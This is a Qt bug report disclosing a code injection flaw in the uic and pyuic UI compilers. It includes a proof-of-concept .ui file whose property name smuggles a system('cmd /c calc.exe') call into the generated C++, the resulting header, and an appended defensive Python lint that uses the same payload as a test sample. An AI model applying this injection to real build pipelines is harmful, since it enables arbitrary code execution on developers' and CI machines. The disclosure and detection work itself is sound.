Qt / QTBUG-126265

uic: Code Injection to Potential Code Execution


Details

    • 53c8d1fe7 (dev), 690c2f2d6 (6.8), d9f5b6170 (6.7), aae20da52 (dev), 0925c2d80 (6.8), 24dfadbf7 (6.7)

    Description

      Due to improper parsing of the .ui file, a user can inject malicious code into the XML design files, and the code generated by uic will include the malicious code. Without proper inspection of the generated code, or in a case where an automated system is used to generate the code and automatically compiles it, this can lead to arbitrary code execution.

      Given this .ui, let's generate the C++ code using uic:

      <?xml version="1.0" encoding="UTF-8"?>
      <ui version="4.0">
          <class>MainWindow</class>
          <widget class="QMainWindow" name="MainWindow">
              <property name="geometry">
                  <rect>
                      <x>0</x>
                      <y>0</y>
                      <width>1000</width>
                      <height>500</height>
                  </rect>
              </property>
              <property name="windowTitle">
                  <string>MainWindow</string>
              </property>
              <widget class="QWidget" name="centralwidget">
                  <widget class="QLabel" name="label">
                      <property name="geometry">
                          <rect>
                              <x>10</x>
                              <y>0</y>
                              <width>1000</width>
                              <height>50</height>
                          </rect>
                      </property>
                      <property name="text(&quot;Hello world!&quot;); system(&quot;cmd /c calc.exe&quot;);//">
                          <string>TextLabel</string>
                      </property>
                  </widget>
              </widget>
          </widget>
          <resources/>
          <connections/>
      </ui>

      The following is the result of the converted code:

      /********************************************************************************
      ** Form generated from reading UI file 'untitled.ui'
      **
      ** Created by: Qt User Interface Compiler version 5.11.1
      **
      ** WARNING! All changes made in this file will be lost when recompiling UI file!
      ********************************************************************************/
      #ifndef UNTITLED_H
      #define UNTITLED_H
      #include <QtCore/QVariant>
      #include <QtWidgets/QApplication>
      #include <QtWidgets/QLabel>
      #include <QtWidgets/QMainWindow>
      #include <QtWidgets/QWidget>
      
      QT_BEGIN_NAMESPACE
      class Ui_MainWindow
      {
      public:
          QWidget *centralwidget;
          QLabel *label;
          void setupUi(QMainWindow *MainWindow)
          {
              if (MainWindow->objectName().isEmpty())
                  MainWindow->setObjectName(QStringLiteral("MainWindow"));
              MainWindow->resize(1000, 500);
              centralwidget = new QWidget(MainWindow);
              centralwidget->setObjectName(QStringLiteral("centralwidget"));
              label = new QLabel(centralwidget);
              label->setObjectName(QStringLiteral("label"));
              label->setGeometry(QRect(10, 0, 1000, 50));
              MainWindow->setCentralWidget(centralwidget);
              retranslateUi(MainWindow);
              QMetaObject::connectSlotsByName(MainWindow);
          } // setupUi
          void retranslateUi(QMainWindow *MainWindow)
          {
              MainWindow->setWindowTitle(QApplication::translate("MainWindow", "MainWindow", nullptr));
              label->setText("Hello world!"); system("cmd /c calc.exe");//(QApplication::translate("MainWindow", "TextLabel", nullptr));
          } // retranslateUi
      };
      
      namespace Ui {
          class MainWindow: public Ui_MainWindow {};
      } // namespace Ui
      
      QT_END_NAMESPACE
      
      #endif // UNTITLED_H

      This behavior also works on the Python version of the compiler (pyuic).

      Please let me know if this is considered a security issue, because it is ambiguous given that uic or pyuic might be used in an automated environment that compiles the generated code.
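      A pre-build lint a defender can run over .ui files before they reach uic or pyuic, added here as an example and not code from the Qt project or the reporter: it flags any name attribute, class attribute or <class> text that is not a plain identifier, which is exactly the field the proof-of-concept abuses. The sample document is constructed from the proof-of-concept above.

```python
import re
import xml.etree.ElementTree as ET

# Names and classes in a .ui file are emitted verbatim as identifiers in the
# generated C++ (uic) or Python (pyuic), so anything that is not a plain
# identifier has no business being there.
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Widget classes may be namespace-qualified, e.g. "Qt::Widget".
CLASS_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(::[A-Za-z_][A-Za-z0-9_]*)*$")


def check_ui(xml_text):
    """Return (tag, field, value) for every identifier-like field that fails
    the identifier check; an empty list means the file passed."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        name = elem.get("name")          # <widget name>, <property name>, ...
        if name is not None and not IDENT.match(name):
            findings.append((elem.tag, "name", name))
        cls = elem.get("class")          # <widget class="QLabel">
        if cls is not None and not CLASS_NAME.match(cls):
            findings.append((elem.tag, "class", cls))
        if elem.tag == "class":          # <class>MainWindow</class> -> Ui_MainWindow
            text = (elem.text or "").strip()
            if not CLASS_NAME.match(text):
                findings.append((elem.tag, "text", text))
    return findings


# Constructed sample modelled on the proof-of-concept in the report: the
# property name carries a statement instead of a bare identifier.
SAMPLE_UI = """<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
 <class>MainWindow</class>
 <widget class="QMainWindow" name="MainWindow">
  <widget class="QWidget" name="centralwidget">
   <widget class="QLabel" name="label">
    <property name="text(&quot;Hello world!&quot;); system(&quot;cmd /c calc.exe&quot;);//">
     <string>TextLabel</string>
    </property>
   </widget>
  </widget>
 </widget>
</ui>"""

if __name__ == "__main__":
    for tag, field, value in check_ui(SAMPLE_UI):
        print(f"REJECT <{tag}> {field}={value!r}")
```

      Running the check in CI and failing the build on any finding keeps a crafted .ui from ever reaching the compiler step.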

          People

            jkobus Jarek Kobus
            aimardcr Aimar Adhity